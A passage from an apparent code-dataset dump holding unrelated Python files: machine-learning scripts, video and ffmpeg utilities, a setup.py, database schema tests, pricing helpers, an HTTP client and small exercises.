preProcessData(content.lower())\n\n\t\t\t\tcorups.append(content)\n\n\t\t\t\t# now labeling with filename\n\t\t\t\tlabeledData.append(directoryPath.replace('../bbcsport/',''))\n\n\nprocessForDir('../bbcsport/athletics')\nprocessForDir('../bbcsport/cricket')\nprocessForDir('../bbcsport/rugby')\nprocessForDir('../bbcsport/tennis')\nprocessForDir('../bbcsport/football')\n\nvectorizer = TfidfVectorizer()\nfinal_vectorizer = vectorizer.fit_transform(corups)\nfinal_vectorizer_array = final_vectorizer.toarray() \nprint(final_vectorizer_array.shape)\n\nX_train, X_test, Y_train, Y_test = train_test_split(final_vectorizer_array, labeledData, test_size = 0.2, random_state = 5)\n\nu,s,v = np.linalg.svd(X_train.T)\nprint(u.shape)\nprint(s.shape)\nprint(v.shape)\nq,w = v.shape\n\ncountt = 0\nbest = -1\nbest_at = 0\nx_axis = []\ny_axis = []\nfor countt in range(1,q):\n\tnumber = countt\n\t# number = 100\n\t# number = int(input())\n\tprint(\"component size\", number)\n\n\tU = u[:,:number]\n\tV = v[:number, :]\n\tprint(U.shape)\n\tprint(V.shape)\n\n\tX_train_svd = V.T\n\tY_train_svd = Y_train\n\n\t# Predict on truncated by library\n\tclassifier = GaussianNB()\n\tclassifier.fit(X_train_svd, Y_train_svd)\n\tX_test_svd = np.matmul(X_test, U)\n\tY_test_svd = Y_test\n\tY_predict = classifier.predict(X_test_svd)\n\n\t# print('\\n\\nusing TruncatedSVD()')\n\t# print(confusion_matrix(Y_test_svd, Y_predict))\n\tcurrent_score = accuracy_score(Y_test_svd, Y_predict)\n\tos.system(\"clear\")\n\tprint(current_score)\n\tx_axis.append(number)\n\ty_axis.append(current_score)\n\tif best < current_score:\n\t\tbest = current_score\n\t\tbest_at = number\n\nimport matplotlib.pyplot as plt\nplt.plot(x_axis, y_axis)\nplt.xlabel('no of components')\nplt.ylabel('accuracy')\nplt.title('Accurcay Graph')\nplt.show()\nprint('Max accuracy achieved at', best_at, 'accuracy', best)","sub_path":"practical6/pr6.py","file_name":"pr6.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81608218","text":"import os\nfrom base.os_base import handle_dir, copy_file, listdir\nfrom utils.image_utils import batch_cv2_resize_images, batch_matlab_resize_images, batch_shift_images\n\n\ndef batch_matlab_resize_videos(ori_root, dest_root, scale=1.0, method='bicubic', filename_template=\"{}.png\"):\n '''\n function:\n resizing videos in batches, same as matlab2017 imresize\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n scale: float, the resize scale\n method: string, the interpolation method,\n optional: 'bilinear', 'bicubic'\n default: 'bicubic'\n filename_template: string, the filename template for saving images\n '''\n handle_dir(dest_root)\n videos = listdir(ori_root)\n for v in videos:\n batch_matlab_resize_images(\n ori_root=os.path.join(ori_root, v),\n dest_root=os.path.join(dest_root, v),\n scale=scale,\n method=method,\n filename_template=filename_template\n )\n print(\"Video\", v, \"resize done !\")\n\n\ndef batch_cv2_resize_videos(ori_root, dest_root, scale=1.0, method='bicubic', filename_template=\"{}.png\"):\n '''\n function:\n resizing videos in batches\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n scale: float, the resize scale\n method: string, the interpolation method,\n optional: 'nearest', 'bilinear', 'bicubic'\n default: 'bicubic'\n filename_template: string, the filename template for saving images\n '''\n handle_dir(dest_root)\n videos = listdir(ori_root)\n for v in videos:\n batch_cv2_resize_images(\n ori_root=os.path.join(ori_root, v),\n dest_root=os.path.join(dest_root, v),\n scale=scale,\n method=method,\n filename_template=filename_template\n )\n print(\"Video\", v, \"resize done !\")\n\n\ndef batch_shift_videos(ori_root, dest_root, offset_x=0., offset_y=0., filename_template=\"{}.png\"):\n '''\n function:\n shifting videos by (offset_x, offset_y) on (axis-x, axis-y) in batches\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n offset_x: float, offset pixels on axis-x\n positive=left; negative=right\n offset_y: float, offset pixels on axis-y\n positive=up; negative=down\n filename_template: string, the filename template for saving images\n '''\n handle_dir(dest_root)\n videos = listdir(ori_root)\n for v in videos:\n batch_shift_images(\n ori_root=os.path.join(ori_root, v),\n dest_root=os.path.join(dest_root, v),\n offset_x=offset_x,\n offset_y=offset_y,\n filename_template=filename_template\n )\n print(\"Video\", v, \"shift done !\")\n\n\ndef extra_frames_from_videos(ori_root, save_root, fname_template='%4d.png', start_end=None):\n '''\n function:\n ext frames from videos\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n fname_template: the template for frames' filename\n start_end: list, len=2, the start and end index for processed videos,\n assert: len(start_end)=2\n default: None, that is processing all videos\n '''\n\n handle_dir(save_root)\n\n videos = sorted(listdir(ori_root))\n if start_end is not None:\n assert len(start_end) == 2, \"only support len(start_end)=2\"\n videos = videos[start_end[0]:start_end[1]]\n\n for v in videos:\n vn = v[:-(len(v.split('.')[-1]) + 1)]\n video_path = os.path.join(ori_root, v)\n png_dir = os.path.join(save_root, vn)\n png_path = os.path.join(png_dir, fname_template)\n handle_dir(png_dir)\n command = 'ffmpeg -i {} {}'.format(video_path, png_path)\n os.system(command)\n print(\"Extra frames from {}\".format(video_path))\n\n\ndef zip_frames_to_videos(ori_root, save_root, fname_template='%4d.png', video_ext='mp4', start_end=None):\n '''\n function:\n zip frames to videos\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n fname_template: the template of frames' filename\n start_end: list, len=2, the start and end index for processed videos,\n assert: len(start_end)=2\n default: None, that is processing all videos\n '''\n handle_dir(save_root)\n\n videos_name = sorted(listdir(ori_root))\n if start_end is not None:\n assert len(start_end) == 2, \"only support len(start_end)=2\"\n videos_name = videos_name[start_end[0]:start_end[1]]\n\n for vn in videos_name:\n imgs_path = os.path.join(ori_root, vn, fname_template)\n video_path = os.path.join(save_root, '{}.{}'.format(vn, video_ext))\n command = 'ffmpeg -i {} -vcodec libx264 -crf 16 -pix_fmt yuv420p {}'.format(imgs_path, video_path)\n # command = 'ffmpeg -r 24000/1001 -i {} -vcodec libx265 -pix_fmt yuv422p -crf 10 {}'.format(\n # imgs_path, video_path) # youku competition\n os.system(command)\n print(\"Zip frames to {}\".format(video_path))\n\n\ndef copy_frames_for_fps(ori_root, save_root, mul=12, fname_template=\"{:0>4}\", ext=\"png\"):\n '''\n function:\n copy frames for fps\n params:\n ori_root: string, the dir of videos that need to be processed\n dest_root: string, the dir to save processed videos\n mul: the multiple of copy\n fname_template: the template of frames' filename\n ext: the ext of frames' filename\n '''\n fname_template = fname_template + '.{}'\n videos_name = sorted(listdir(ori_root))\n handle_dir(save_root)\n for vn in videos_name:\n frmames = sorted(listdir(os.path.join(ori_root, vn)))\n handle_dir(os.path.join(save_root, vn))\n for i, f in enumerate(frmames):\n for j in range(mul):\n now_idx = i * mul + j\n src = os.path.join(ori_root, vn, f)\n dest = os.path.join(save_root, vn, fname_template.format(now_idx, ext))\n copy_file(src, dest)\n","sub_path":"utils/video_utils.py","file_name":"video_utils.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519706331","text":"#!/usr/bin/env/python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom pinboard import metadata\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nwith open(os.path.join(os.path.dirname(__file__), \"README.rst\")) as file:\n long_description = file.read()\n\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: Apache Software License\",\n]\n\nsetup(\n name='pinboard',\n version=metadata.__version__,\n url=\"http://github.com/lionheart/pinboard.py\",\n long_description=long_description,\n description=\"A Python wrapper for Pinboard.in\",\n classifiers=classifiers,\n keywords=\"pinboard\",\n license=metadata.__license__,\n author=metadata.__author__,\n author_email=metadata.__email__,\n packages=['pinboard'],\n package_data={'': ['LICENSE', 'README.rst']},\n # scripts=['scripts/pinboard']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"494314924","text":"dados = []\nresp = ' '\nperg = 0\nwhile True:\n dados.append(str(input('Nome: ')))\n dados.append(float(input('Nota 1: ')))\n dados.append(float(input('Nota 2: ')))\n print('-=-'*12)\n resp = str(input('Que continuar [S/N]? ')).upper().strip()\n if resp == 'N':\n break\nprint(f'{\"Cod.\":<4} {\"Nome\":<10} {\"Média\":>8} ')\nfor c in range(0, len(dados), 3):\n print(f'{c:<4} {dados[c]:<10} {(dados[c+1]+dados[c+2])/2:>8.1f}')\nprint('-=-'*12)\nwhile perg != 999:\n print('\\033[31mOBS\\033[m -> Digite 999 para interromper!!')\n print('-=-'*12)\n perg = int(input('Mostrar notas de qual aluno? '))\n print('-=-'*12)\n if perg == 999:\n break\n else:\n for c in range(0, len(dados), 3):\n if perg == c:\n print(f'Aluno(a): \\033[34m{dados[c]}\\033[m, notas: \\033[34m[{dados[c+1]}] [{dados[c+2]}]\\033[m')\n print('-=-'*12)\nprint('Fim do Programa.')\n","sub_path":"desafios/desafio89.py","file_name":"desafio89.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64380839","text":"\"\"\"Batch Normalization for TensorFlow.\nParag K. Mital, Jan 2016.\"\"\"\n\nimport tensorflow as tf\n\n\nclass batch_norm(object):\n \"\"\"Basic usage from: http://stackoverflow.com/a/33950177\n\n Parag K. Mital, Jan 2016\n\n Attributes\n ----------\n batch_size : int\n Size of the batch. Set to -1 to fit to current net.\n beta : Tensor\n A 1D beta Tensor with size matching the last dimension of t.\n An offset to be added to the normalized tensor.\n ema : tf.train.ExponentialMovingAverage\n For computing the moving average.\n epsilon : float\n A small float number to avoid dividing by 0.\n gamma : Tensor\n If \"scale_after_normalization\" is true, this tensor will be multiplied\n with the normalized tensor.\n momentum : float\n The decay to use for the moving average.\n name : str\n The variable scope for all variables under batch normalization.\n \"\"\"\n\n def __init__(self, batch_size, epsilon=1e-5,\n momentum=0.1, name=\"batch_norm\"):\n \"\"\"Summary\n\n Parameters\n ----------\n batch_size : int\n Size of the batch, or -1 for size to fit.\n epsilon : float, optional\n A small float number to avoid dividing by 0.\n momentum : float, optional\n Decay to use for the moving average.\n name : str, optional\n Variable scope will be under this prefix.\n \"\"\"\n with tf.variable_scope(name) as scope:\n self.epsilon = epsilon\n self.momentum = momentum\n self.batch_size = batch_size\n self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)\n self.name = name\n\n def __call__(self, x, train=True):\n \"\"\"Applies/updates the BN to the input Tensor.\n\n Parameters\n ----------\n x : Tensor\n The input tensor to normalize.\n train : bool, optional\n Whether or not to train parameters.\n\n Returns\n -------\n x_normed : Tensor\n The normalized Tensor.\n \"\"\"\n shape = x.get_shape().as_list()\n\n # Using a variable scope means any new variables\n # will be prefixed with \"variable_scope/\", e.g.:\n # \"variable_scope/new_variable\". Also, using\n # TensorBoard, this will make everything very\n # nicely grouped.\n with tf.variable_scope(self.name) as scope:\n self.gamma = tf.get_variable(\n \"gamma\", [shape[-1]],\n initializer=tf.random_normal_initializer(1., 0.02))\n self.beta = tf.get_variable(\n \"beta\", [shape[-1]],\n initializer=tf.constant_initializer(0.))\n\n mean, variance = tf.nn.moments(x, [0, 1, 2])\n\n return tf.nn.batch_norm_with_global_normalization(\n x, mean, variance, self.beta, self.gamma, self.epsilon,\n scale_after_normalization=True)\n","sub_path":"batch_norm.py","file_name":"batch_norm.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"32688176","text":"from ..models.url import URL\nfrom apscheduler.schedulers.base import BaseScheduler\nfrom apscheduler.triggers.interval import IntervalTrigger\nimport requests\n\n# # Register all jobs\n# for (key, value) in jobs.items():\n#\n# value['id'] = key\n# scheduler.add_job(**value)\n#\n# scheduler.add_job(\n# func=register_request,\n# trigger=IntervalTrigger(seconds=3),\n# replace_existing=True,\n# id=\"register_request\",\n# name=\"Registers station at station office\")\n#\n#\n#\n\n\nclass StationClient:\n \"\"\"\n Client for the station route of the PHT service\n \"\"\"\n\n def __init__(self, uri: URL):\n self.uri = uri\n self.register_id = \"StationClient-send_station_ping_{}\".format(uri)\n self.uri_payload = {'uri': self.uri}\n\n def register_station_ping(self, uri: URL, scheduler: BaseScheduler):\n \"\"\"\n Registers the station Client for sending regular pings to the /station PHT service\n\n \"\"\"\n scheduler.add_job(\n func=lambda: requests.post(self.uri, data=self.uri_payload),\n trigger=IntervalTrigger(seconds=3),\n id=self.register_id,\n name=\"Send Station Ping\",\n max_instances=1,\n replace_existing=True)\n\n def remove_station_ping(self, scheduler: BaseScheduler):\n scheduler.remove_job(job_id=self.register_id)\n","sub_path":"app/lib/restclient/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"428359274","text":"import sqlite3\n\nimport tests.util as util\n\nfrom indexd.index.drivers.alchemy import SQLAlchemyIndexDriver\nfrom indexd.alias.drivers.alchemy import SQLAlchemyAliasDriver\n\n\nOLD_SQLITE = sqlite3.sqlite_version_info < (3, 7, 16)\n\nINDEX_HOST = \"index.sq3\"\nALIAS_HOST = \"alias.sq3\"\n\nINDEX_TABLES = {\n \"base_version\": [(0, \"baseid\", \"VARCHAR\", 1, None, 1)],\n \"index_record\": [\n (0, \"did\", \"VARCHAR\", 1, None, 1),\n (1, \"baseid\", \"VARCHAR\", 0, None, 0),\n (2, \"rev\", \"VARCHAR\", 0, None, 0),\n (3, \"form\", \"VARCHAR\", 0, None, 0),\n (4, \"size\", \"BIGINT\", 0, None, 0),\n (5, \"created_date\", \"DATETIME\", 0, None, 0),\n (6, \"updated_date\", \"DATETIME\", 0, None, 0),\n (7, \"file_name\", \"VARCHAR\", 0, None, 0),\n (8, \"version\", \"VARCHAR\", 0, None, 0),\n (9, \"uploader\", \"VARCHAR\", 0, None, 0),\n (10, \"description\", \"VARCHAR\", 0, None, 0),\n (11, \"content_created_date\", \"DATETIME\", 0, None, 0),\n (12, \"content_updated_date\", \"DATETIME\", 0, None, 0),\n ],\n \"index_record_hash\": [\n (0, \"did\", \"VARCHAR\", 1, None, 1),\n (1, \"hash_type\", \"VARCHAR\", 1, None, 1 if OLD_SQLITE else 2),\n (2, \"hash_value\", \"VARCHAR\", 0, None, 0),\n ],\n \"index_record_url\": [\n (0, \"did\", \"VARCHAR\", 1, None, 1),\n (1, \"url\", \"VARCHAR\", 1, None, 1 if OLD_SQLITE else 2),\n ],\n \"index_schema_version\": [(0, \"version\", \"INTEGER\", 1, None, 1)],\n \"drs_bundle_record\": [\n (0, \"bundle_id\", \"VARCHAR\", 1, None, 1),\n (1, \"name\", \"VARCHAR\", 0, None, 0),\n (2, \"created_time\", \"DATETIME\", 0, None, 0),\n (3, \"updated_time\", \"DATETIME\", 0, None, 0),\n (4, \"checksum\", \"VARCHAR\", 0, None, 0),\n (5, \"size\", \"BIGINT\", 0, None, 0),\n (6, \"bundle_data\", \"TEXT\", 0, None, 0),\n (7, \"description\", \"TEXT\", 0, None, 0),\n (8, \"version\", \"VARCHAR\", 0, None, 0),\n (9, \"aliases\", \"VARCHAR\", 0, None, 0),\n ],\n}\n\nALIAS_TABLES = {\n \"alias_record\": [\n (0, \"name\", \"VARCHAR\", 1, None, 1),\n (1, \"rev\", \"VARCHAR\", 0, None, 0),\n (2, \"size\", \"BIGINT\", 0, None, 0),\n (3, \"release\", \"VARCHAR\", 0, None, 0),\n (4, \"metastring\", \"VARCHAR\", 0, None, 0),\n (5, \"keeper_authority\", \"VARCHAR\", 0, None, 0),\n ],\n \"alias_record_hash\": [\n (0, \"name\", \"VARCHAR\", 1, None, 1),\n (1, \"hash_type\", \"VARCHAR\", 1, None, 1 if OLD_SQLITE else 2),\n (2, \"hash_value\", \"VARCHAR\", 0, None, 0),\n ],\n \"alias_record_host_authority\": [\n (0, \"name\", \"VARCHAR\", 1, None, 1),\n (1, \"host\", \"VARCHAR\", 1, None, 1 if OLD_SQLITE else 2),\n ],\n \"alias_schema_version\": [(0, \"version\", \"INTEGER\", 1, None, 1)],\n}\n\nINDEX_CONFIG = {\"driver\": SQLAlchemyIndexDriver(\"sqlite:///index.sq3\")}\n\nALIAS_CONFIG = {\"driver\": SQLAlchemyAliasDriver(\"sqlite:///alias.sq3\")}\n\n\n@util.removes(INDEX_HOST)\ndef test_sqlite3_index_setup_tables():\n \"\"\"\n Tests that the SQLite3 index database gets set up correctly.\n \"\"\"\n SQLAlchemyIndexDriver(\"sqlite:///index.sq3\")\n\n with sqlite3.connect(INDEX_HOST) as conn:\n c = conn.execute(\n \"\"\"\n SELECT name FROM sqlite_master WHERE type = 'table'\n \"\"\"\n )\n\n tables = [i[0] for i in c]\n\n for table in INDEX_TABLES:\n assert table in tables, \"{table} not created\".format(table=table)\n\n for table, schema in list(INDEX_TABLES.items()):\n # NOTE PRAGMA's don't work with parameters...\n c = conn.execute(\n \"\"\"\n PRAGMA table_info ('{table}')\n \"\"\".format(\n table=table\n )\n )\n\n assert schema == [i for i in c]\n\n\n@util.removes(ALIAS_HOST)\ndef test_sqlite3_alias_setup_tables():\n \"\"\"\n Tests that the SQLite3 alias database gets set up correctly.\n \"\"\"\n SQLAlchemyAliasDriver(\"sqlite:///alias.sq3\")\n\n with sqlite3.connect(ALIAS_HOST) as conn:\n c = conn.execute(\n \"\"\"\n SELECT name FROM sqlite_master WHERE type = 'table'\n \"\"\"\n )\n\n tables = [i[0] for i in c]\n\n for table in ALIAS_TABLES:\n assert table in tables, \"{table} not created\".format(table=table)\n\n for table, schema in list(ALIAS_TABLES.items()):\n # NOTE PRAGMA's don't work with parameters...\n c = conn.execute(\n \"\"\"\n PRAGMA table_info ('{table}')\n \"\"\".format(\n table=table\n )\n )\n\n assert schema == [i for i in c]\n","sub_path":"tests/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"797672","text":"# Copyright (c) 2014, Adaptiv Design\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n\n# 3. Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom sellmo.utils.text import underscore_concat\n\nfrom .price import Price\nfrom .currency import Currency\nfrom .constants import AMOUNT_FIELD, CURRENCY_FIELD\n\n\ndef resolve_components(components):\n if components is True:\n return list(Price.COMPONENTS)\n elif not components:\n return []\n elif isinstance(components, (list, tuple, set)):\n return [\n component\n for component in Price.COMPONENTS if component in components\n ]\n else:\n raise ValueError(components)\n\n\ndef resolve_currencies(currencies):\n if currencies is True:\n return list(Currency.get_all())\n elif not currencies:\n return False\n elif isinstance(currencies, (list, tuple, set)):\n return [\n currency for currency in Currency.get_all() if currency in currencies\n ]\n else:\n raise ValueError(currencies)\n\n\ndef price_field_name(name, currency=None, component=None, multiplicity=None):\n parts = [name]\n if currency is not None:\n parts.append(currency)\n if component is not None:\n if multiplicity is not None and multiplicity > 1:\n component = '%s%s' % (component, multiplicity)\n parts.append(component)\n else:\n parts.append(AMOUNT_FIELD)\n\n return underscore_concat(*parts)\n\n\ndef currency_field_name(name):\n return underscore_concat(name, CURRENCY_FIELD)\n\n\ndef is_default_currency(currency):\n return currency == Currency.default()\n\n\ndef price_field_names(\n name,\n multi_currency=False,\n currencies=True,\n components=None,\n extra_fields=False,\n components_only=False\n):\n\n result = []\n currencies = resolve_currencies(currencies)\n components = resolve_components(components)\n if multi_currency:\n for currency in currencies:\n if not components_only:\n result.append(price_field_name(name, currency=currency))\n for component in components:\n for multiplicity in range(1, component.multiplicity + 1):\n field_name = price_field_name(\n name,\n currency=currency,\n component=component,\n multiplicity=multiplicity\n )\n result.append(field_name)\n if extra_fields:\n for extra_field_name in component.extra_fields:\n full_extra_field_name = underscore_concat(\n field_name, extra_field_name\n )\n result.append(full_extra_field_name)\n else:\n if not components_only:\n result.append(price_field_name(name))\n result.append(currency_field_name(name))\n for component in components:\n for multiplicity in range(1, component.multiplicity + 1):\n field_name = price_field_name(\n name,\n component=component,\n multiplicity=multiplicity\n )\n result.append(field_name)\n if extra_fields:\n for extra_field_name in component.extra_fields:\n full_extra_field_name = underscore_concat(\n field_name, extra_field_name\n )\n result.append(full_extra_field_name)\n\n return result\n","sub_path":"sellmo/apps/pricing/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"427106914","text":"import json\r\nimport requests\r\nimport os\r\nfrom src.exceptions.server_failure_exception import ServerFailureException\r\nfrom src.exceptions.not_authorized_exception import NotAuthorizedException\r\n\r\n\r\nclass HttpClient:\r\n\r\n DEFAULT_TIMEOUT = 90\r\n server_url = None\r\n\r\n def __init__(self, server_url):\r\n self.server_url = server_url\r\n\r\n def post_to_server(self, servlet_name, json_request):\r\n url = self.construct_url(self.server_url, servlet_name)\r\n headers = {'content-type': 'application/json'}\r\n response = requests.post(url, data = json.dumps(json_request), headers = headers, timeout = self.DEFAULT_TIMEOUT)\r\n\r\n if response is None:\r\n raise ServerFailureException(\r\n \"The server failed to respond at \" + self.server_url + \". Is the server listening at this location?\")\r\n\r\n response_json = json.loads(response.text)\r\n\r\n if (response.status_code == 401):\r\n raise NotAuthorizedException(response_json['results'])\r\n\r\n if not response.ok and not \"results\" in response_json:\r\n raise ServerFailureException(\r\n \"The server responded at \" + self.server_url + \" with an unknown error!\")\r\n\r\n return response_json\r\n\r\n def construct_url(self, server_url, servlet_name):\r\n finalized_url = None\r\n base_url = server_url\r\n query_string = \"\"\r\n\r\n if \"?\" in server_url:\r\n url_comps = server_url.split(\"?\")\r\n base_url = url_comps[0]\r\n if len(url_comps) >= 2:\r\n query_string = \"?\" + url_comps[1]\r\n \r\n finalized_url = base_url + \"/\" + servlet_name + query_string\r\n return finalized_url\r\n","sub_path":"src/httpexecutor/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"114145447","text":"# Autor: Carlos Martínez Rodríguez\n# Descripción: Calcular pago de trabajador con horas extras\n\n# Función que calcula el pago normal por horas de trabajo\ndef calcularPagoNormal(horasNormales, pagoHora):\n total = horasNormales * pagoHora\n return total\n# Función que calcula el pago por horas extras tomando en cuenta el porcentaje extra de 75%\ndef calcularPAgoExtra(horasExtras, pagoHora):\n total = horasExtras * (pagoHora * 1.75)\n return total\n\ndef main():\n # Entradas del usuario\n horasNormales = int(input(\"Teclea las horas normales trabajadas: \"))\n horasExtras = int(input(\"Teclea las horas extras trabajadas: \"))\n pagoHora = int(input(\"Teclea el pago por hora: \"))\n # Calcular pago de horas normales, extras y el total de ambas\n totalHorasN = calcularPagoNormal(horasNormales, pagoHora)\n totalHorasE = calcularPAgoExtra(horasExtras, pagoHora)\n totalPago = totalHorasN + totalHorasE\n # Imprimir\n print(\"Pago normal: $%.02f\" % totalHorasN)\n print(\"Pago extra: $%.02f\" % totalHorasE)\n print(\"---------------\")\n print(\"Total: $%.02f\" % totalPago)\n\nmain()","sub_path":"PagoTrabajador.py","file_name":"PagoTrabajador.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583310973","text":"import numpy as np\nimport math\nfrom sklearn.model_selection import GridSearchCV\nfrom xgboost.sklearn import XGBRegressor\n\n\ndef tune_xgb(params, n, x_train, y_train, cv):\n\n # if the parameter is a range, expand the range, otherwise keep the number\n grid = {}\n for i in params:\n if type(params[i]) in [list, tuple]:\n grid[i] = []\n if i in ['max_depth', 'n_estimators']:\n by = int((params[i][1] - params[i][0])/n)\n if by < 1:\n by = 1\n rg = range(params[i][0], params[i][1], by)\n else:\n rg = np.linspace(params[i][0], params[i][1], n)\n for j in range(0, len(rg)):\n grid[i].append(rg[j])\n\n # mean value for all the parameters to use as initial guess\n mean = {}\n for i in params:\n if i in ['max_depth', 'n_estimators']:\n mean[i] = int(np.mean(params[i]))\n else:\n mean[i] = np.mean(params[i])\n\n est = XGBRegressor(colsample_bytree=mean['colsample_bytree'],\n gamma=mean['gamma'],\n learning_rate=mean['learning_rate'],\n max_depth=mean['max_depth'],\n min_child_weight=mean['min_child_weight'],\n n_estimators=mean['n_estimators'],\n reg_alpha=mean['reg_alpha'],\n reg_lambda=mean['reg_lambda'],\n subsample=mean['subsample'])\n\n # Use sklearn gridsearch to evaluate the best parameters\n gsearch = GridSearchCV(estimator=est, param_grid=grid, scoring='neg_mean_squared_error', cv=cv)\n\n gsearch.fit(x_train, y_train)\n\n print('XGBOOST TUNNING')\n # print('Scores: ', gsearch.cv_results_)\n print('Best parameters', gsearch.best_estimator_)\n print('Best score', gsearch.best_score_)\n\n return gsearch.best_estimator_\n","sub_path":"tunexgboost.py","file_name":"tunexgboost.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"46210408","text":"from struct import Struct \nfrom enum import Enum, auto, unique\nimport logging\nimport binascii\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s')\n\n# VERSIONING\n# change version in BaseFormat for all data\n# i.e. if and of DataFormat, CommandFormat or AlarmFormat change\n# then change the RPI_VERSION\n\nclass BaseFormat():\n def __init__(self):\n self._RPI_VERSION = 0xA1\n self._byteArray = None\n self._type = PAYLOAD_TYPE.UNSET\n self._version = 0\n\n @property\n def byteArray(self):\n return self._byteArray\n \n @byteArray.setter\n def byteArray(self):\n print(\"Use fromByteArray to change this\")\n\n # check for mismatch between pi and microcontroller version\n def checkVersion(self):\n if self._RPI_VERSION == self._version :\n self._version_error = True\n else : \n self._version_error = False\n\n def getSize(self):\n return len(self._byteArray)\n \n def getType(self):\n return self._type\n\n \n# =======================================\n# data type payload\n# =======================================\nclass DataFormat(BaseFormat):\n\n # define the format here, including version\n def __init__(self):\n super().__init__()\n # struct will set the num bytes per variable\n # B = unsigned char = 1 byte\n # X = padding = 1 byte\n # H = unsigned short = 2 bytes\n # I = unsigned int = 4 bytes\n # < = little endian\n # > = big endian\n # ! = network format (big endian)\n self._dataStruct = Struct(\"= minLat\n b = globalLats <= maxLat\n e=a*b\n bandLats = globalLats[e]\n foundIndexMinLat = False\n foundIndexMaxLat = False\n i = 0 #Loop counter\n while foundIndexMinLat == False:\n if e[i] == True:\n indexMinLat = i\n foundIndexMinLat = True\n i += 1\n i = 1 #With negative indices this starts at the end\n while foundIndexMaxLat == False:\n if e[-i] == True:\n indexMaxLat = len(e)-i\n foundIndexMaxLat = True\n i += 1\n #Now retrieving the data in the band--at all times\n globalData = Data.variables[varname][:]\n bandData = globalData[:, indexMinLat:indexMaxLat+1, :] \n #Now, calculating weights and replicating them to the 3D array\n areaWeights = np.cos(bandLats*np.pi/180)\n areaWeights3D = np.swapaxes(np.tile(areaWeights,\n (np.shape(bandData)[0],np.shape(bandData)[2],1)),\n 1,2)\n #Now calculating the weighted mean\n weighted3DMatrix = bandData*areaWeights3D\n sumWeighted = np.sum(weighted3DMatrix, axis=(1,2))\n sumWeights3D = np.sum(areaWeights3D, axis=(1,2))\n weightedMean = sumWeighted/sumWeights3D\n return weightedMean\n \n\n# The following three functions calculate meridional transport of latent, \n# geopotential and thermal energy from daily output for meridional wind, \n# geopotential height, specific humidity, and air tempertaure, and take\n# a mean over specified range of days. \n#\n# Inputs: \n# data_va: NetCDF Dataset object for the daily meridional wind output (m/s)\n# data_ta: 